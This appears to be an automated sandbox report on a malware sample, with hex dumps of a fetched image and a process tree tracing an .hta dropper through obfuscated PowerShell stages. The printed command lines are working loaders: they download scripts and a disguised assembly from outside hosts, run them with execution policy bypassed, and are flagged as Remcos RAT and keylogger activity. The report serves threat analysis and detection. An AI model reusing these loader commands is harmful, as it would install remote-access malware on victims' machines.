                                                                                2024-10-17 14:04:49 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                2024-10-17 14:04:49 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                2024-10-17 14:04:49 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                2024-10-17 14:04:49 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                2024-10-17 14:04:49 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                2024-10-17 14:04:49 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                2024-10-17 14:04:49 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                2024-10-17 14:04:49 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                2024-10-17 14:04:49 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                2024-10-17 14:04:49 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:10:04:32
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:mshta.exe "C:\Users\user\Desktop\nicetokissthebestthingsiwantotgetmebackwith.hta"
                                                                                Imagebase:0x1e0000
                                                                                File size:13'312 bytes
                                                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:10:04:33
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
                                                                                Imagebase:0xdd0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:10:04:33
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:10:04:33
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe
                                                                                Imagebase:0xdd0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:10:04:37
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline"
                                                                                Imagebase:0x4e0000
                                                                                File size:2'141'552 bytes
                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:10:04:37
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE985.tmp" "c:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP"
                                                                                Imagebase:0x920000
                                                                                File size:46'832 bytes
                                                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:10:04:43
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS"
                                                                                Imagebase:0xca0000
                                                                                File size:147'456 bytes
                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:10:04:44
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                Imagebase:0xdd0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:10:04:44
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:9
                                                                                Start time:10:04:45
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
                                                                                Imagebase:0xdd0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
